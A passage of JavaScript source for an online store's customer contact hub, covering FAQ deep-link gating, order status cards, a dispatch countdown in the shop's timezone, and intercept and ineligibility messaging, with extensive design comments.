  /* THE GATE THE SEARCH INDEX USES, applied at the lookup rather than only at
     the index. Without it this was the one reader of CONFIG.faq that could see
     entries nothing else could. See lcFaqEntryVisible(). */
  if (!lcFaqEntryVisible(entry)) return;

  /* The lastResort answer is gated behind its own visibility toggle everywhere
     else it can surface: the hub's persistent button, and the escape hatch a
     weak search adds under the results. A URL must not be the one door left
     open after the merchant has closed all the others. */
  if (entry.lastResort && !shown("faqHuman")) return;

  /* AND EVERY OTHER ANSWER IS GATED ON THE SEARCH BOX — the same sentence,
     scoped to the toggle instead of to one entry. With "Show the FAQ search
     box" off and only the human link on, VIEWS.hub still renders #faq-results,
     because showLastResortAnswer() writes into it; but the merchant has removed
     the entire browse-the-answers surface. A URL must not be able to drop a
     full answer, video and all, into a card that offers nothing except "talk to
     a person" — with no search box to explain where it came from and no way to
     clear it. A lastResort deep link stays legitimate while faqHuman is on;
     nothing else does. */
  if (!entry.lastResort && !shown("faqSearch")) return;

  /* Both FAQ controls switched off means VIEWS.hub renders no FAQ card at all,
     so there is nowhere to put an answer. Hub, silently — the alternative is
     injecting a section the merchant deliberately removed. */
  var out = $("#faq-results");
  if (!out) return;

  out.innerHTML = lcRenderAnswer(entry);
  var count = $("#faq-count");
  if (count) count.textContent = t("faq.count.one");

  var art = out.querySelector(".lc-answer");
  if (!art) return;
  /* FOCUSABLE, BUT NOT FOCUSED — and this is the constraint, not an oversight.
     Calling focus() here would paint a focus ring on the answer the instant the
     page finished loading: the same first-render focus theft that was just
     taken out of Router.render(), only now on an element the customer has not
     touched at all. #faq-count is an aria-live region and has just been
     written, so a screen-reader user is told an answer is showing without the
     caret moving anywhere. tabindex stays so the answer can still be focused
     programmatically later. */
  art.setAttribute("tabindex", "-1");
  lcDeepScrollTo(art);
}

/* Route, having already rendered the hub. Everything below either navigates on
   top of a working hub or leaves it alone — which is what makes an unknown id a
   non-event rather than a blank page. */
function lcApplyDeepLink(raw) {
  if (!raw) return;
  var id = String(raw.lc == null ? "" : raw.lc).trim().toLowerCase();
  if (!id) return;

  if (id === "faq") {
    lcOpenFaqDeepLink(String(raw.q == null ? "" : raw.q).trim().toLowerCase());
    return;
  }

  /* THE OWN-PROPERTY CHECK IS LOAD-BEARING, not defensive decoration.
     startFlow() guards with `if (!def) return`, which is sound for the authored
     data-goto strings that were its only callers — but FLOWS is a plain object,
     so `FLOWS["toString"]` is a function, truthy, with no `next`. Fed straight
     through, ?lc=toString reached Router.go(undefined) and VIEWS[undefined],
     which throws and paints the error card. The URL is the first untrusted
     caller startFlow() has ever had; it gets checked at the boundary. */
  if (!lcHasOwn(FLOWS, id)) return;

  /* `something-else` is not a destination — startFlow() answers it by focusing
     the search box, because from a card click that is exactly right. At boot it
     is not: auto-focusing a text field on arrival is an unannounced context
     change, it opens the on-screen keyboard on a phone nobody asked to type on,
     and it is the same "the page took my caret before I had read anything"
     complaint the first-render focus fix was raised to settle. Bring the card
     into view and let the customer decide to type. */
  if (id === "something-else") {
    var box = $("#faq-q") || $("#faq-results");
    lcDeepScrollTo((box && box.closest && box.closest(".lc-card")) || box);
    return;
  }

  /* Everything else goes through the one funnel: `requires` is enforced there,
     needsOrder sends the customer to the lookup step there, and this stays the
     only description of what a flow id means. */
  startFlow(id);
}

/* Explicit "this is not my order" escape. Reachable from every in-flow screen
   via the session chip, so a customer with two open orders is no longer stuck
   with whichever one they happened to look up first. */
function switchOrder() {
  var flow = State.flow;
  clearOrderSession();
  State.flow = flow && FLOWS[flow] && FLOWS[flow].needsOrder ? flow : "order-status";
  Router.go("lookup");
}

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   SHARED VIEW FRAGMENTS
   =========================================================================== */
function backBar(label) {
  /* When an order is loaded, every screen says so and offers a way out. On a
     shared device the next person must be able to see, and drop, whose order
     is on screen. */
  var chip = State.order
    ? '<div class="lc-session-chip">' +
        '<span>' + t("shared.session.viewing", { order: esc(State.order.name) }) + '</span>' +
        '<button type="button" class="lc-btn--link" data-switch-order>' +
          esc(t("shared.session.switch")) + '</button>' +
      '</div>'
    : '';
  return chip +
         '<div class="lc-crumbs">' +
           '<button type="button" class="lc-btn--link" data-back>← ' +
             esc(label || t("shared.back")) + '</button>' +
         '</div>';
}

function orderSummaryCard(order, opts) {
  opts = opts || {};

  /* VISIBILITY TOGGLE ("Show the order summary card"). Gated here rather than
     at the twenty-odd call sites, so it cannot be half-applied.

     DEGRADES TO NOTHING, ON PURPOSE, AND SAFELY. This card is a recap: on every
     screen that renders it there is already a heading, an explanation and an
     action underneath, so removing it never empties a screen. The one thing it
     carries that is not repeated elsewhere is WHICH order is on screen — and
     backBar() puts that in the session chip at the top of every in-flow screen
     ("You are looking at order #LC12345 — not your order?"), which is also the
     shared-device privacy control. So the answer to "whose order am I looking
     at" survives the card being switched off. */
  if (!shown("orderSummary")) return "";

  var el = evaluate(order);

  /* DELIVERED IS CHECKED FIRST, AND ONLY WHEN THE CARRIER SAID SO.

     evaluate() has no DELIVERED state and deliberately still does not: its job
     is "can we still stop this", and everything past dispatch is one answer to
     that. But the chip is a status label, and "On its way" over a parcel that
     arrived four days ago is wrong on every screen — most visibly on the
     returns flow, where the customer is standing there holding the thing.

     Delivery is strictly downstream of DISPATCHED, so refining the label here
     cannot change any eligibility decision. `certain` is required: an
     estimated delivery date is a guess, and a guess must not be presented to a
     customer as a status. */
  var lcDeliv = returnDeliveryOf(order, nowMs(order));
  var chipKey =
      (lcDeliv.certain && lcDeliv.at <= nowMs(order)) ? "summary.chip.delivered"
    : el.state === "DISPATCHED"            ? "summary.chip.dispatched"
    : el.state === "TRACKING_ASSIGNED"     ? "summary.chip.trackingAssigned"
    : el.state === "CANCELLED"             ? "summary.chip.cancelled"
    : el.state === "ON_HOLD"               ? "summary.chip.onHold"
    : el.state === "PARTIALLY_FULFILLED"   ? "summary.chip.partiallyFulfilled"
    : el.state === "FULFILLED_NO_TRACKING" ? "summary.chip.fulfilledNoTracking"
    : el.state === "OPEN"                  ? "summary.chip.open"
    :                                        "summary.chip.unknown";
  var chipClass =
      el.state === "CANCELLED" ? "lc-chip lc-chip--alert"
    : (el.state === "ON_HOLD" || chipKey === "summary.chip.unknown") ? "lc-chip lc-chip--quiet"
    : "lc-chip";
  var stateChip = '<span class="' + chipClass + '">' + esc(t(chipKey)) + '</span>';

  var items = order.lineItems.map(function (li) {
    var protectionNote = isSeel(li)
      ? '<br><small style="color:var(--ink-soft)">' + esc(t("summary.seelNote")) + '</small>'
      : '';
    return '<li><span>' + esc(itemLabel(li)) + protectionNote +
           '<br><span class="lc-qty">' + esc(t("shared.quantity", { qty: li.quantity })) + '</span></span>' +
           '<span class="lc-price">' + money(li.originalTotalSet.shopMoney.amount) + '</span></li>';
  }).join("");

  return '<section class="lc-card">' +
    '<div class="lc-preview__h"><h2 style="font-size:calc(1.08235294em * var(--lc-heading-scale))">' +
      esc(t("summary.heading", { order: order.name })) + '</h2>' + stateChip + '</div>' +
    '<dl class="lc-kv">' +
      '<dt>' + esc(t("summary.label.placed")) + '</dt><dd>' + esc(fmtDateTime(order.createdAt)) + '</dd>' +
      '<dt>' + esc(t("summary.label.total")) + '</dt><dd>' + money(order.totalPriceSet.shopMoney.amount) + ' ' +
        esc(order.totalPriceSet.shopMoney.currencyCode) + '</dd>' +
      '<dt>' + esc(t("summary.label.deliveringTo")) + '</dt><dd>' + esc(order.shippingAddress.city) + ', ' +
        esc(order.shippingAddress.provinceCode || order.shippingAddress.province) + ', ' +
        esc(order.shippingAddress.country) + '</dd>' +
    '</dl>' +
    (opts.hideItems ? "" : '<hr class="lc-sep"><ul class="lc-items">' + items + '</ul>') +
  '</section>';
}

/* Live countdown to the next dispatch cutoff. Display only.
   The schedule lives in CONFIG.fulfillment.dispatchDays / dispatchCutoffLocal
   and skips Sundays, so this never counts down to a day nobody is working. */
function countdownCard() {
  /* Heading was "Packed and awaiting dispatch" while the card body said
     "waiting with our packing team" and the timeline twenty pixels below
     rendered "Packed and handed to the courier" as NOT done. To an older
     reader "Packed" means it has gone — which is the exact misunderstanding
     this hub exists to prevent, on the state ~47% of live orders sit in. */
  return '<section class="lc-card lc-card--info">' +
    '<h2>' + esc(t("countdown.heading")) + '</h2>' +
    '<p>' + t("countdown.body") + '</p>' +
    '<p style="margin-bottom:4px">' + t("countdown.nextBatch") + '</p>' +
    '<p class="lc-countdown" data-countdown aria-live="off">—</p>' +
    '<p style="margin:0;color:var(--ink-soft);font-size:0.87529412em" data-countdown-when></p>' +
    /* THIS SENTENCE EARNS ITS PLACE — do not delete it as clutter.
       The 3PL confirmed (2026-08-03) that their warehouse system pulls orders
       out of Shopify "at several random time slots each day". So this countdown
       says when the parcel is expected to LEAVE; it emphatically does not say
       how long the customer has to change anything. Without this line a reader
       sees "next dispatch in 18 hours" and reasonably concludes they have 18
       hours to think about it — and an order pulled ten minutes from now is
       already beyond our reach. Telling them to ask straight away is the only
       honest reading of a random pull schedule. */
    '<p style="margin:12px 0 0;font-size:0.87529412em">' + t("countdown.changeNote") + '</p>' +
  '</section>';
}

/* "Friday 14:50" is a bare weekday on a 24-hour clock — for this audience,
   spell out today/tomorrow, the date, and use a 12-hour time.

   RENDERED IN THE SHOP'S TIMEZONE, NOT THE VIEWER'S, and labelled as such.
   The cutoff is 15:00 Pacific/Auckland = 03:00Z, which is the PREVIOUS calendar
   day everywhere in the Americas. Formatting it in the browser's zone and
   appending "your time" put "That is today (Sunday, August 9) at 8:00 PM your
   time" directly underneath "we hand everything to the courier in one batch a
   day, every day except Sunday" — the store markets US/UK/AU/NZ, and every
   Monday batch (52 of 2026's 314 dispatch instants) rendered as a Sunday for US
   viewers, with the Saturday batch never named at all. The dispatch happens in
   New Zealand, so New Zealand is the honest frame; "our time" is what makes it
   parse. today/tomorrow are computed in the same zone, or they contradict the
   date they are bracketing. */
function fmtBatchWhen(target) {
  var tz = CONFIG.fulfillment.dispatchTimezone;
  var opts = { weekday:"long", day:"numeric", month:"long" };
  var topts = { hour:"numeric", minute:"2-digit", hour12:true };
  var day, time, prefix = "";
  try {
    var now = new Date();
    var keyOf = function (d) {
      var p = zonedDateParts(d, tz);
      return p.y + "-" + p.m + "-" + p.d;
    };
    var tKey = keyOf(target);
    /* "today" and "tomorrow" are relative to the reader, so they may only be
       used when the reader's calendar day and the shop's are the same day. At
       10:00 Sunday in Los Angeles it is already Monday in Auckland, and
       "That is today (Monday, August 3)" to someone whose phone says Sunday
       reintroduces the exact contradiction naming the timezone was meant to
       remove. When the two zones disagree we simply name the day. */
    var viewerNowKey = now.getFullYear() + "-" + (now.getMonth() + 1) + "-" + now.getDate();
    prefix = keyOf(now) !== viewerNowKey ? ""
           : tKey === keyOf(now) ? t("countdown.today")
           : tKey === keyOf(new Date(now.getTime() + 86400000)) ? t("countdown.tomorrow") : "";
    opts.timeZone = tz; topts.timeZone = tz;
    day  = target.toLocaleDateString([], opts);
    time = target.toLocaleTimeString([], topts);
  } catch (e) {
    /* No usable Intl timezone database. Fall back to the viewer's clock rather
       than showing nothing — and drop the "our time" label with it, because in
       that branch it would be a claim we cannot back up. */
    delete opts.timeZone; delete topts.timeZone;
    return t("countdown.whenNoTimezone", {
      when: target.toLocaleDateString([], opts),
      time: target.toLocaleTimeString([], topts)
    });
  }
  return t("countdown.when", {
    when: prefix ? t("countdown.whenPrefixed", { prefix: prefix, day: day }) : day,
    time: time
  });
}

function startCountdown() {
  var elTime = $("[data-countdown]"), elWhen = $("[data-countdown-when]");
  if (!elTime) return;
  var target = nextDispatchUtc();
  function paintWhen() { if (elWhen) elWhen.textContent = fmtBatchWhen(target); }
  paintWhen();
  function tick() {
    var left = target - Date.now();
    /* Roll over instead of freezing at "0h 00m 00s" forever for anyone who
       leaves the status page open across the cutoff. The next target skips
       Sundays, so at the Saturday cutoff this jumps to Monday. */
    if (left <= 0) { target = nextDispatchUtc(); paintWhen(); left = target - Date.now(); }
    elTime.textContent = fmtCountdown(left);
  }
  tick();
  Router.timers.push(setInterval(tick, 1000));
}

/* Honest explanation + the right next step, per eligibility state. */
/* Branches on el.state. It used to assume SHIPPED for everything that was not
   CANCELLED, so an ON_HOLD order — which is exactly what this hub's own cancel
   flow creates, via fulfillmentOrderHold — was told it had been handed to a
   courier and pushed into a return for a parcel that does not exist. */
function ineligibleCard(order, flow) {
  var el = evaluate(order);
  var what = t(flow === "cancel-order" ? "ineligible.what.cancel"
             : flow === "amend-order"  ? "ineligible.what.amend"
             /* Round 5. Reads correctly in all four sentence frames this string
                is dropped into ("there is nothing left to …", "we can no longer
                …", "whether there is still time to …"). */
             : flow === "fix-spelling" ? "ineligible.what.spelling"
             : "ineligible.what.address");
  var mailHref = 'mailto:' + esc(CONFIG.store.supportEmail) + '?subject=' +
                 encodeURIComponent(t("shared.mail.subjectHelp", { order: order.name }));

  /* A3 — the returns gate, computed ONCE for every already-gone state.
     The client's reasoning, followed literally: a customer who came here to fix
     an address or stop an order had not been thinking about sending the parcel
     back. Dangling "start a return" in front of them plants the idea. Most
     people, told plainly that the parcel is on its way, will accept the
     address, ask a neighbour, or arrange a redirect themselves. Offering a
     return this early manufactures returns that would not otherwise happen.

     They can still reach Returns & refunds from the hub under their own steam.
     That is the intended path, and it is one tap away.

     KEPT for amend-order, where a wrong item genuinely has no other remedy
     once it has shipped, and of course for the Returns & refunds flow itself.

     This used to be declared halfway down, inside the SHIPPED section, so the
     "already packed, no tracking yet" branch above it — shared by every flow —
     went on offering "See how returns work" as its PRIMARY button on an order
     that had no tracking number to offer instead.

     ROUND 5: `fix-spelling` is on the SAME side of this rule as address-change
     and cancel, i.e. no returns CTA. Deliberately not grouped with amend-order
     despite being an amendment: a personalised item is the one thing on the
     store that is genuinely not returnable — nobody else wants a backpack with
     another child's name stitched on it — so pointing at returns here would be
     offering a remedy that does not exist. */
  var offerReturns = flow === "amend-order";

  /* What an address-change / cancel customer can genuinely still do when the
     parcel has gone but no scan exists yet. No carrier name (A2), no returns. */
  var noTrackingYetAdvice = '<p>' + t("ineligible.noTrackingAdvice") + '</p>';
  var mail = '<a class="lc-btn lc-btn--ghost" href="mailto:' + esc(CONFIG.store.supportEmail) +
             '">' + esc(t("shared.btn.emailUs")) + '</a>';
  var statusBtn = '<button type="button" class="lc-btn lc-btn--ghost" data-goto="order-status">' +
                  esc(t("shared.btn.checkStatus")) + '</button>';

  if (el.state === "CANCELLED") {
    return '<section class="lc-card lc-card--warn">' +
      '<h2>' + esc(t("ineligible.cancelled.heading")) + '</h2>' +
      '<p>' + t("ineligible.cancelled.body", { order: esc(order.name), what: esc(what) }) + '</p>' +
      '<div class="lc-btn-row">' + mail + '</div>' +
    '</section>';
  }

  /* Paused with the packing team, usually because of an earlier request from
     this very hub. Nothing has been posted. Never offer a return here. */
  if (el.state === "ON_HOLD") {
    /* "Nothing has been posted yet" is only true when nothing carries a tracking
       number AND no carrier scan has been seen. A part-shipped order whose
       remaining fulfilment order this hub's own cancel flow put on hold DOES
       have a parcel out — and that sentence, in bold, is the one the customer
       quotes back when it lands. `trackingMoved` is in the test as well as the
       number, because a 17TRACK first scan can reach us on an order whose
       tracking number has not (see the same override in evaluate()). */
    var holdNothingPosted = '<p>' +
      t((el.tracking.length || el.trackingMoved)
        ? "ineligible.hold.bodyPartial" : "ineligible.hold.body") + '</p>';
    /* DEMOTED FROM A BUTTON TO A SENTENCE (client's decision, round 4), the same
       treatment the returns view already gives its email line and the same one
       VIEWS.status now gives this state. A btn--ghost "Email us" sat in the same
       row, at the same size, as the self-service action beside it — on the one
       state whose whole message is "there is nothing else you need to do", that
       reads as the recommended next step and manufactures the second message the
       paragraph above is asking people not to send. As an inline link it is
       still one tap, and it is offered only for the case that genuinely needs
       it: something has changed since they asked. `statusBtn` still occupies the
       row, so nothing is left empty. */
    return '<section class="lc-card lc-card--info">' +
      '<h2>' + esc(t("ineligible.hold.heading")) + '</h2>' +
      holdNothingPosted +
      '<p>' + t("ineligible.hold.note", { mailHref: mailHref }) + '</p>' +
      '<div class="lc-btn-row">' + statusBtn + '</div>' +
    '</section>';
  }

  /* Nothing shipped, no fulfillment, but no open fulfillment order either —
     e.g. Shopify has not created one yet on a brand-new order. We genuinely do
     not know, so we say so and route to a human instead of inventing a courier
     handover that has not happened. */
  if (el.state === "UNCONFIRMED") {
    return '<section class="lc-card lc-card--info">' +
      '<h2>' + esc(t("ineligible.unconfirmed.heading")) + '</h2>' +
      /* "Our records show", not an assertion about the parcel — the same
         rewrite the other five instances of this claim were given. Asserting
         the physical state and then admitting in the same sentence that we
         cannot see it is the contradiction that rewrite existed to remove. */
      '<p>' + t("ineligible.unconfirmed.body1", { what: esc(what) }) + '</p>' +
      '<p>' + t("ineligible.unconfirmed.body2") + '</p>' +
      '<div class="lc-btn-row">' +
        '<a class="lc-btn" href="' + mailHref + '">' +
          esc(t("shared.btn.emailAboutOrder")) + '</a>' +
        statusBtn +
      '</div>' +
    '</section>';
  }

  /* Packed, but no courier scan exists — so do not name the carrier as though
     one does, and do not claim a tracking number is on the way as fact. */
  if (el.state === "FULFILLED_NO_TRACKING" || el.state === "PARTIALLY_FULFILLED") {
    var partial = el.state === "PARTIALLY_FULFILLED";
    /* card--info, not card--warn: --err-bg/--err-line is the file's dedicated
       red error surface. "Your order has been packed" is not an error, and for
       this audience a red panel is the strongest cue on the screen — stronger
       than the sentence inside it. See the DISPATCHED branches below. */
    return '<section class="lc-card lc-card--info">' +
      '<h2>' + esc(t(partial ? "ineligible.packed.headingPartial"
                             : "ineligible.packed.heading")) + '</h2>' +
      '<p>' + t(partial ? "ineligible.packed.bodyPartial" : "ineligible.packed.body",
                { what: esc(what) }) +
      t("ineligible.packed.tail") + '</p>' +
      (offerReturns
        /* A7: the mechanics are now self-service and time-boxed, so say so
           rather than promising an email with a return address. */
        ? '<p>' + t("ineligible.packed.returnsNote1") + '</p>' +
          '<p>' + t("ineligible.packed.returnsNote2") + '</p>'
        : noTrackingYetAdvice) +
      '<div class="lc-btn-row">' +
        (offerReturns
          ? '<button type="button" class="lc-btn" data-goto="refund-return">' +
              esc(t("shared.btn.seeReturns")) + '</button>' +
            statusBtn
          /* With no returns CTA and no tracking number yet, the status screen
             is the only useful action — so it must not be left as the ghost. */
          : '<button type="button" class="lc-btn" data-goto="order-status">' +
            esc(t("shared.btn.checkStatus")) + '</button>') +
      '</div>' +
    '</section>';
  }

  /* DISPATCHED — the parcel has demonstrably moved, or its label is older than
     CONFIG.fulfillment.interceptWindowHours so the dispatch cycle has certainly
     run. This is the ONLY tracked state that reaches this function:
     TRACKING_ASSIGNED is actionable, so its customers get the forms, not a
     refusal. CLOSED_NO_TRACKING also lands here, with trackingBits empty. */
  var trackingBits = el.tracking.length
    ? '<p>' + t("ineligible.trackingBits", {
        number: esc(el.tracking[0].number),
        date:   esc(fmtDate(el.tracking[0].shippedAt))
      }) + '</p>' : '';

  /* A3 — NO RETURNS CTA ON THIS STATE for address changes and cancellations.
     `offerReturns` is declared at the top of this function so the branch above
     is governed by it too.

     card--info, not card--warn. card--warn is --err-bg/--err-line — the file's
     dedicated red error surface, shared with chip--alert and invalid fields. A
     red panel is the universal visual for "something has gone wrong", and for
     an older audience it is the strongest cue on the screen, stronger than the
     sentence inside it. A3 asks for warm and final, NOT apologetic to the point
     of inviting escalation; a red box saying the parcel is on its way is
     exactly what makes someone email to ask what the problem is. card--info is
     --pb-050 #EAF2FB / --pb-100: ink 12.90:1, pb-700 link 5.25:1, ink-soft
     5.48:1 — all AA. card--warn is reserved for real problems (PO Box
     rejection, lookup failure). */
  var carrier = esc(t("shared.carrierGeneric"));

  if (flow === "address-change") {
    return '<section class="lc-card lc-card--info">' +
      '<h2>' + esc(t("ineligible.address.heading")) + '</h2>' +
      '<p>' + t("ineligible.address.body", { carrier: carrier }) + '</p>' +
      trackingBits +
      '<p>' + t("ineligible.address.advice") + '</p>' +
      '<p style="margin:0">' + t("ineligible.address.cardNote") + '</p>' +
      '<div class="lc-btn-row">' +
        trackButton() +
        statusBtn +
      '</div>' +
      trackHandoffNote() +
      '<p class="lc-answer__link" style="margin-top:6px">' +
        '<a href="' + esc(CONFIG.urls.shippingPolicy) + '">' +
        esc(t("ineligible.address.policyLink")) + '</a></p>' +
    '</section>';
  }

  if (flow === "cancel-order") {
    return '<section class="lc-card lc-card--info">' +
      '<h2>' + esc(t("ineligible.cancel.heading")) + '</h2>' +
      '<p>' + t("ineligible.cancel.body", { carrier: carrier }) + '</p>' +
      trackingBits +
      '<p>' + t("ineligible.cancel.advice") + '</p>' +
      '<div class="lc-btn-row">' +
        trackButton() +
        statusBtn +
      '</div>' +
      trackHandoffNote() +
    '</section>';
  }

  return '<section class="lc-card lc-card--info">' +
    '<h2>' + esc(t("ineligible.gone.heading")) + '</h2>' +
    '<p>' + t("ineligible.gone.body", { carrier: carrier, what: esc(what) }) + '</p>' +
    trackingBits +
    (offerReturns ? '<p>' + t("ineligible.gone.returnsNote") + '</p>' : '') +
    '<div class="lc-btn-row">' +
      (offerReturns
        ? '<button type="button" class="lc-btn" data-goto="refund-return">' +
            esc(t("shared.btn.seeReturns")) + '</button>' +
          trackButton({ ghost:true })
        : trackButton()) +
      statusBtn +
    '</div>' +
    trackHandoffNote() +
  '</section>';
}

/* Surfaced when the 12h policy backstop and real fulfilment state disagree.
   Only meaningful where "has it been packed?" is the actual question: for a
   CANCELLED / ON_HOLD / UNCONFIRMED order this note used to sit directly above
   a card saying the opposite ("placed only 2 hours ago, but it has already
   been packed and collected" above "This order is already cancelled"). */
function policyNote(el) {
  if (!el.policyDisagrees) return "";
  /* PARTIALLY_FULFILLED is excluded too: "it has already been packed and
     collected" is false for the half still sitting in the warehouse, and the
     card underneath already explains the split precisely. */
  if (el.state !== "OPEN" && el.state !== "TRACKING_ASSIGNED" &&
      el.state !== "DISPATCHED" && el.state !== "FULFILLED_NO_TRACKING") return "";
  if (el.actionable) {
    /* Two different true sentences. Neither one may imply the published window
       is longer than 12 hours — we still promise 12 and simply keep trying
       after it, which is the honest way round.

       WHY "OUR RECORDS SHOW" AND NOT "IT HAS NOT BEEN PACKED" (P0, round 5).
       Verified with the 3PL 2026-08-03: they fulfil inside MabangErp3 and
       upload the tracking number to Shopify AFTERWARDS. Shopify therefore lags
       reality, and there is a blind window in which the parcel is being picked
       and packed while the only thing this page can see still says OPEN. A flat
       "it genuinely has not been packed yet" is a statement about the physical
       parcel that we are not in a position to make, and it is the sentence the
       customer quotes back when the request fails.
       So: describe OUR RECORDS, and keep the confidence in the outcome
       ("a good chance we can still catch it") rather than in the claim. Warm,
       not hedged — the caveat that the packing team still has to confirm is
       carried by the cards underneath and stays exactly where it was. */
    var why = t(el.interceptOnly ? "policy.actionable.whyIntercept"
                                 : "policy.actionable.whyOpen");
    return '<section class="lc-card lc-card--info">' +
      '<p style="margin:0">' + t("policy.actionable.body", {
        hours:  Math.round(el.hoursSinceOrder),
        window: CONFIG.fulfillment.policyWindowHours,
        why:    why
      }) + '</p>' +
    '</section>';
  }
  return '<section class="lc-card lc-card--info">' +
    '<p style="margin:0">' + t("policy.packed.body", {
      hours: Math.round(el.hoursSinceOrder),
      days:  dispatchDaysPhrase()
    }) + '</p>' +
  '</section>';
}

/* ===========================================================================
   TRACKING_ASSIGNED — the "we will ask" card.

   Shown at the top of the cancel / amend / address flows when a tracking number
   exists but the parcel has not been shown to have moved and the label is still
   inside CONFIG.fulfillment.interceptWindowHours.

   THE TONE IS THE WHOLE POINT. Three things have to be true on this card at
   once, and the older reader has to be able to hold all three:
     1. yes, we are going to ask, right now, on your behalf;
     2. they can often catch it at this stage — this is not a courtesy;
     3. nobody is promising anything, and that is not us being evasive.
   Overstate it and we retract a promise later, which generates more email than
   a refusal ever did. Understate it and the customer emails to argue, which is
   the exact failure this whole hub exists to remove.

   NO RETURNS CTA (round-2 rule A3). Nothing here has been delivered — a return
   is not a remedy for a parcel still on the packing bench, and dangling one
   plants an idea the customer did not arrive with.
   =========================================================================== */
function interceptNoticeCard(el, what) {
  /* The number is almost certainly already in their inbox, so explain it rather
     than hide it — an unexplained tracking number is read as "it has shipped",
     which is the misunderstanding that starts the argument. */
  var num = el.tracking.length
    ? '<p>' + t("intercept.number", { number: esc(el.tracking[0].number) }) + '</p>'
    : '';
  return '<section class="lc-card lc-card--info">' +
    '<h2>' + esc(t("intercept.heading")) + '</h2>' +
    '<p>' + t("intercept.body1") + '</p>' +
    num +
    '<p>' + t("intercept.body2") + '</p>' +
    '<p style="margin:0">' + t("intercept.body3", { what: esc(what) }) + '</p>' +
  '</section>';
}

/* The extra line added to the success screen when the request went out from
   TRACKING_ASSIGNED rather than OPEN. Same honesty, one sentence, after the
   fact — the customer has already read the long version on the way in. */
/* ---------------------------------------------------------------------------
   WHOSE VERDICT WINS ON THE SUCCESS PATH.

   The browser's `order` is as old as the lookup, and submitRequest() exists
   precisely because the order moves underneath it: OPEN and TRACKING_ASSIGNED
   are BOTH interceptable, so the Worker accepts a submit across that transition
   and echoes the state it actually acted on. Building the confirmation from
   evaluate(order) alone threw that echo away — it posted an INTERCEPTION
   REQUEST to the packing team, then told the customer "if they cannot catch it
   in time we will tell you straight away" instead of the note that says the
   label is already printed and carries the old address, and wrote a staff note
   asserting the fulfilment order was still OPEN for an order that was already
   labelled.

   So: trust the server's `state` when it sent one, and fall back to the local
   copy only when it did not. -------------------------------------------------*/
function interceptVerdict(res, el) {
  if (res && res.state) return String(res.state) === "TRACKING_ASSIGNED";
  return !!(el && el.interceptOnly);
}

/* STAFF-FACING clause naming the label an interception is against. Every field
   is guarded rather than assumed: the verdict can come from the server while
   the tracking detail can only come from the browser's older copy, so "the
   server says labelled, we have no number" is a REACHABLE and legitimate state
   and must not print "NaNh ago" into a CS row. */
function interceptStaffLine(el) {
  var num = (el && el.tracking && el.tracking.length && el.tracking[0].number)
    ? el.tracking[0].number : "number unknown";
  var age = (el && typeof el.hoursSinceTracking === "number" && isFinite(el.hoursSinceTracking))
    ? ", " + Math.round(el.hoursSinceTracking) + "h ago" : "";
  return "Tracking already assigned (" + num + age + ") and no carrier movement seen";
}

/* `intercept` overrides el.interceptOnly when the server named a state — see
   interceptVerdict(). Omitted, it behaves exactly as it always did. */
function interceptSuccessNote(el, intercept) {
  return (intercept === undefined ? !!(el && el.interceptOnly) : !!intercept)
    ? t("intercept.successNote")
    : "";
}

/* Rendered instead of a gate form when this flow has already been submitted for
   this order, so the same stop request cannot be fired at the 3PL twice. */
function alreadyRequestedCard(order, flow) {
  var id = State.submitted[flow];
  var what = flowRequestLabel(flow);
  return '<section class="lc-card lc-card--good">' +
    '<h2>' + esc(t("already.heading")) + '</h2>' +
    '<p>' + t("already.body", {
      what:  esc(what),
      order: esc(order.name),
      /* State.submitted[flow] holds the SERVER'S request id, or `true` when the
         Worker confirmed the request without naming one. The flow is submitted
         either way and must still be blocked; there is simply no reference to
         quote, and printing "true" would be worse than printing nothing. */
      reference: (typeof id === "string" && id)
        ? t("already.reference", { id: esc(id) }) : ""
    }) + '</p>' +
    /* NO EMAIL ADDRESS ON THIS CARD (client's decision, round 4). This is the
       one screen in the file where a fresh address is actively harmful: the
       customer already has an open ticket and a reply coming to their inbox, so
       inviting a new message creates the SECOND ticket the paragraph above is
       explaining is the problem. The reply path is also the only one that
       reaches the same person with the same history attached. */
    '<p style="margin:0">' + t("already.note") + '</p>' +
    '<div class="lc-btn-row">' +
      '<button type="button" class="lc-btn lc-btn--ghost" data-goto="order-status">' +
        esc(t("shared.btn.checkStatus")) + '</button>' +
    '</div>' +
  '</section>';
}

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   VIEWS
   =========================================================================== */
var VIEWS = {};

/* ===========================================================================
   HUB CARD ICONS.

   In the prototype the drawings were an object literal in this file. In the
   theme they live in `snippets/contact-hub-icons.liquid`, rendered once by the
   section as a hidden set of

       <template data-lc-icon="parcel"><path …/></template>

   elements inside `#lc-hub-icons`. Two reasons, and neither is tidiness:

   1. A designer editing an icon edits a Liquid snippet in the theme editor's
      code view, alongside the rest of the theme, instead of a minified-looking
      string inside a 7,000-line JS asset they are rightly afraid of.
   2. It keeps the SVG out of the JSON blob. Icon markup in JSON means escaping
      quotes inside escaped quotes, and one bad paste silently empties the hub.

   The <template> is inert: its contents are parsed but never rendered, never
   fetched and never in the accessibility tree. innerHTML gives us the path set
   back exactly as written, and injecting it into a real <svg> below parses it
   in the SVG namespace, which is what makes `<path>`/`<circle>` work.

   DECORATIVE, ALWAYS. Each rendered icon carries aria-hidden="true" and
   focusable="false" (the latter for IE/older Edge, which put SVG in the tab
   order otherwise). The card's own title and description are the label.

   Missing snippet, missing template or a typo'd icon name all return "" — the
   card then renders with no badge, which is a cosmetic degradation, not a
   broken screen. Do not make this throw.
   =========================================================================== */
var _lcIconCache = {};

function hubIconPaths(name) {
  var key = String(name || "");
  if (!key) return "";
  if (Object.prototype.hasOwnProperty.call(_lcIconCache, key)) return _lcIconCache[key];

  var out = "";
  /* Attribute-selector injection is not possible here — the name is compared
     against a whitelist of what the snippet actually rendered rather than being
     interpolated into a selector string. */
  var tpls = $$("#lc-hub-icons [data-lc-icon]");
  for (var i = 0; i < tpls.length; i++) {
    if (tpls[i].getAttribute("data-lc-icon") === key) {
      /* `.innerHTML` IS THE RIGHT ACCESSOR ON A <template>, and it does not
         look it. A template's child list is always empty — the parser moves
         its children into a separate `.content` DocumentFragment — but the
         HTML fragment-serialization algorithm special-cases template elements
         and serializes that fragment, so this returns the icon's markup, not
         "". (This replaced a `tpls[i].content ? A : A` ternary whose two arms
         were identical: it read as a feature-detect with a fallback and was
         neither.) */
      out = tpls[i].innerHTML || "";
      break;
    }
  }
  _lcIconCache[key] = out;
  return out;
}


/* WHICH HUB CARDS ARE WORTH SHOWING.

